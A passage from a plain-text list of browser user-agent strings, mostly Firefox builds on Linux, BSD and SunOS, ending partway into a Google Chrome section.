3.5.30729)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 SUSE/3.6.8-0.1.1 Firefox/3.6.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090405 Firefox/3.6a1pre\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090428 Firefox/3.6a1pre\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100130 Gentoo Firefox/3.6\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100222 Ubuntu/10.04 (lucid) Firefox/3.6\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100305 Gentoo Firefox/3.5.7\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9a1) Gecko/20060112 Firefox/1.6a1\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b3pre) Gecko/2008011321 Firefox/3.0b3pre\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b3pre) Gecko/2008020509 Firefox/3.0b3pre\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b4) Gecko/2008031318 Firefox/3.0b4\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b4) Gecko/2008040813 Firefox/3.0b4\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008041816 Fedora/3.0-0.55.beta5.fc9 Firefox/3.0b5\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008061317 (Gentoo) Firefox/3.0\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008062315 (Gentoo) Firefox/3.0\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008062908 Firefox/3.0 (Debian-3.0~rc2-2)\nMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9pre) Gecko/2008042312 Firefox/3.0b5\nMozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9.0.3) Gecko/2008092515 Ubuntu/8.10 (intrepid) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9.0.4) Gecko/2008110510 Red Hat/3.0.4-1.el5_2 Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9) Gecko/2008061015 Ubuntu/8.04 (hardy) Firefox/3.0\nMozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9) Gecko/2008061017 Firefox/3.0\nMozilla/5.0 (X11; U; Linux x86_64; es-CL; rv:1.9.1.9) Gecko/20100402 Ubuntu/9.10 (karmic) Firefox/3.5.9\nMozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12\nMozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.12) Gecko/2009072711 CentOS/3.0.12-1.el5.centos Firefox/3.0.12\nMozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.7) Gecko/2009022800 SUSE/3.0.7-1.4 Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc11 Firefox/3.5.8\nMozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.12) Gecko/20101026 SUSE/3.6.12-0.7.1 Firefox/3.6.12\nMozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc13 Firefox/3.6.12\nMozilla/5.0 (X11; U; Linux x86_64; es-MX; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12\nMozilla/5.0 (X11; U; Linux x86_64; fi-FI; rv:1.8.1.1) Gecko/20060601 Firefox/2.0.0.1 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux x86_64; fi-FI; rv:1.9.0.14) Gecko/2009090217 Firefox/3.0.14\nMozilla/5.0 (X11; U; Linux x86_64; fi-FI; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.7.12) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.8.1.16) Gecko/20080715 Fedora/2.0.0.16-1.fc8 Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.8.1.1) Gecko/20060601 Firefox/2.0.0.1 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.8.1.3) Gecko/20070322 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.8) Gecko/20051231 Firefox/1.5\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.04 (jaunty) Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.14) Gecko/2009090216 Ubuntu/8.04 (hardy) Firefox/3.0.14\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.19) Gecko/2010051407 CentOS/3.0.19-1.el5.centos Firefox/3.0.19\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-1.1 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.1) Gecko/2008071222 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.3pre\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.5\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 GTB7.0\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.3) Gecko/20100403 Fedora/3.6.3-4.fc13 Firefox/3.6.3\nMozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9) Gecko/2008061017 Firefox/3.0\nMozilla/5.0 (X11; U; Linux x86_64) Gecko/2008072820 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; hu; rv:1.8.1.14) Gecko/20080416 Fedora/2.0.0.14-1.fc7 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.8.1.2) Gecko/20060601 Firefox/2.0.0.2 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.14) Gecko/2009090216 Ubuntu/8.04 (hardy) Firefox/3.0.14\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.1) Gecko/2008071717 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.3) Gecko/2008092813 Gentoo Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.8) Gecko/2009033100 Ubuntu/9.04 (jaunty) Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.15) Gecko/20101027 Fedora/3.5.15-1.fc12 Firefox/3.5.15\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-2.fc12 Firefox/3.5.9\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.9) Gecko/20100402 Ubuntu/9.10 (karmic) Firefox/3.5.9 (.NET CLR 3.5.30729)\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 (.NET CLR 3.5.30729)\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.2.20) Gecko/20110805 Ubuntu/10.04 (lucid) Firefox/3.6.20\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.2.24) Gecko/20111101 SUSE/3.6.24-0.2.1 Firefox/3.6.24\nMozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9) Gecko/2008061017 Firefox/3.0\nMozilla/5.0 (X11; U; Linux x86_64; ja-JP; rv:1.9.2.16) Gecko/20110323 Ubuntu/10.10 (maverick) Firefox/3.6.16\nMozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.4) Gecko/20091016 SUSE/3.5.4-1.1.2 Firefox/3.5.4\nMozilla/5.0 (X11; U; Linux x86_64; ko-KR; rv:1.9.0.1) Gecko/2008071717 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; nb-NO; rv:1.9.0.8) Gecko/2009032600 SUSE/3.0.8-1.2 Firefox/3.0.8\nMozilla/5.0 (X11; U; Linux x86_64; nb-NO; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux x86_64; nl-NL; rv:1.7.6) Gecko/20050318 Firefox/1.0.2\nMozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13\nMozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.8.1.2pre) Gecko/20061023 SUSE/2.0.0.1-0.1 Firefox/2.0.0.2pre\nMozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.8) Gecko/20051128 SUSE/1.5-0.1 Firefox/1.5.0.1\nMozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.1) Gecko/2008071222 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.1) Gecko/2008071222 Ubuntu (hardy) Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.1) Gecko/2008071222 Ubuntu/hardy Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.5) Gecko/2008121623 Ubuntu/8.10 (intrepid) Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9) Gecko/2008060309 Firefox/3.0\nMozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:2.0) Gecko/20110307 Firefox/4.0\nMozilla/5.0 (X11; U; Linux x86_64; pl; rv:1.8.1.4) Gecko/20070611 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; Linux x86_64; pl; rv:1.8.1.7) Gecko/20071009 Firefox/2.0.0.7\nMozilla/5.0 (X11; U; Linux x86_64; pl; rv:1.9.1.2) Gecko/20090911 Slackware Firefox/3.5.2\nMozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.14\nMozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9b5) Gecko/2008041515 Firefox/3.0b5\nMozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.14 (.NET CLR 3.5.30729)\nMozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8\nMozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.2.11) Gecko/20101028 CentOS/3.6-2.el5.centos Firefox/3.6.11\nMozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.10 (maverick) Firefox/3.6.18\nMozilla/5.0 (X11; U; Linux x86_64; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux x86_64; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1\nMozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13\nMozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.04 (hardy) Firefox/3.0.8 GTB5\nMozilla/5.0 (X11; U; Linux x86; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux x86; es-ES; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux x86; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1\nMozilla/5.0 (X11; U; Linux x86; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/8.04 (hardy) Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Mac OSX; it; rv:1.9.0.7) Gecko/2009030422 Firefox/3.0.7\nMozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8.1.6) Gecko/20080115 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; NetBSD amd64; fr-FR; rv:1.8.0.7) Gecko/20061102 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8.0.5) Gecko/20060818 Firefox/1.5.0.5\nMozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8) Gecko/20060104 Firefox/1.5\nMozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.9.2.12) Gecko/20101030 Firefox/3.6.12\nMozilla/5.0 (X11; U; NetBSD sparc64; fr-FR; rv:1.8.1.6) Gecko/20070822 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; OpenBSD amd64; en-US; rv:1.8.0.9) Gecko/20070101 Firefox/1.5.0.9\nMozilla/5.0 (X11; U; OpenBSD amd64; en-US; rv:1.8.1.6) Gecko/20070817 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; OpenBSD amd64; en-US; rv:1.9.0.1) Gecko/2008081402 Firefox/3.0.1\nMozilla/5.0 (X11; U; OpenBSD i386; de-DE; rv:1.8.1.6) Gecko/20080429 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.7.10) Gecko/20050919 (No IDN) Firefox/1.0.6\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.1) Gecko/20060213 Firefox/1.5.0.1\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.4) Gecko/20060628 Firefox/1.5.0.4\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.5) Gecko/20060819 Firefox/1.5.0.5\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.7) Gecko/20060920 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.7) Gecko/20061017 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.8) Gecko/20061110 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.16) Gecko/20080812 Firefox/2.0.0.16\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.3) Gecko/20070505 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.4) Gecko/20070704 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.4) Gecko/20070704 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.4) Gecko/20071127 Firefox/2.0.0.11\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.6) Gecko/20070819 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.7) Gecko/20070930 Firefox/2.0.0.7\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20\nMozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.8) Gecko/20101230 Firefox/3.6.8\nMozilla/5.0 (X11; U; OpenBSD sparc64; en-AU; rv:1.8.1.6) Gecko/20071225 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; OpenBSD sparc64; en-CA; rv:1.8.0.2) Gecko/20060429 Firefox/1.5.0.2\nMozilla/5.0 (X11; U; OpenBSD sparc64; en-US; rv:1.8.1.6) Gecko/20070816 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; OpenBSD sparc64; pl-PL; rv:1.8.0.2) Gecko/20060429 Firefox/1.5.0.2\nMozilla/5.0 (X11; U; Slackware Linux i686; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10\nMozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7.12) Gecko/20051121 Firefox/1.0.7 (Nexenta package 1.0.7)\nMozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7.5) Gecko/20041109 Firefox/1.0\nMozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.0.5) Gecko/20060728 Firefox/1.5.0.5\nMozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.3) Gecko/20070423 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.4) Gecko/20070622 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0\nMozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1) Gecko/20061211 Firefox/2.0\nMozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4\nMozilla/5.0 (X11; U; SunOS i86pc; en-ZW; rv:1.8.1.6) Gecko/20071125 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; SunOS i86pc; fr; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4\nMozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:1.8.1.6) Gecko/20070805 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:1.9.1b4) Gecko/20090428 Firefox/2.0.0.0\nMozilla/5.0 (X11; U; SunOS sun4u; en-GB; rv:1.8.0.1) Gecko/20060206 Firefox/1.5.0.1\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.12) Gecko/20050922 Firefox/1.0.7\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.12) Gecko/20050927 Firefox/1.0.7\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.8) Gecko/20050512 Firefox/1.0.4\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.0.1) Gecko/20060206 Firefox/1.5.0.1\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.0.7) Gecko/20060915 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.11) Gecko/20080118 Firefox/2.0.0.11\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.12) Gecko/20080210 Firefox/2.0.0.12\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.14) Gecko/20080418 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.20) Gecko/20090108 Firefox/2.0.0.20\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.2) Gecko/20070226 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.3) Gecko/20070321 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.4) Gecko/20070531 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.4) Gecko/20070622 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.9) Gecko/20071102 Firefox/2.0.0.9\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1) Gecko/20061228 Firefox/2.0\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8) Gecko/20051130 Firefox/1.5\nMozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5\nMozilla/5.0 (X11; U; SunOS sun4u; it-IT;) Gecko/20080000 Firefox/3.0\nMozilla/5.0 (X11; U; SunOS sun4u; pl-PL; rv:1.8.1.6) Gecko/20071217 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; SunOS sun4v; en-US; rv:1.8.1.3) Gecko/20070321 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; SunOS sun4v; es-ES; rv:1.8.1.9) Gecko/20071127 Firefox/2.0.0.9\nMozilla/5.0 (X11; U; Windows NT 5.0; en-US; rv:1.9b4) Gecko/2008030318 Firefox/3.0b4\nMozilla/5.0 (X11; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7\nMozilla/5.0 (X11; U; Windows NT i686; fr; rv:1.9.0.1) Gecko/2008070206 Firefox/2.0.0.8\nMozilla/5.0 (X11; U; x86_64 Linux; en_GB, en_US; rv:1.9.2) Gecko/20100115 Firefox/3.6\nMozilla/5.0 (X11; U; x86_64 Linux; en_US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7\nMozilla/5.0 (X11; U; x86_64 Linux; en_US; rv:1.8.16) Gecko/20071015 Firefox/2.0.0.8\nMozilla/5.0 (X11; U; x86_64 Linux; en_US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5\nMozilla/5.0 (ZX-81; U; CP/M86; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1\nMozilla/6.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4\nMozilla/6.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:2.0.0.0) Gecko/20061028 Firefox/3.0\nMozilla/6.0 (Windows NT 6.2; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1\nMozilla/6.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8\nMozilla/6.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)\nMozilla/6.0 (Windows; U; Windows NT 7.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.9 (.NET CLR 3.5.30729)\n\n# Google Chrome\n\nMozilla/4.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/11.0.1245.0 Safari/537.36\nMozilla/4.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0\nMozilla/4.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19\nMozilla/5.0 ArchLinux (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1\nMozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100\nMozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30\nMozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.60 Safari/534.30\nMozilla/5.0 (Linux; U; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13\nMozilla/5.0 (Macintosh; AMD Mac OS X 10_8_2) AppleWebKit/535.22 (KHTML, like Gecko) Chrome/18.6.872\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.31 (KHTML, like Gecko) Chrome/13.0.748.0 Safari/534.31\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.151 Safari/535.19\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.801.0 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.32 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/535.1 (KHTML, like 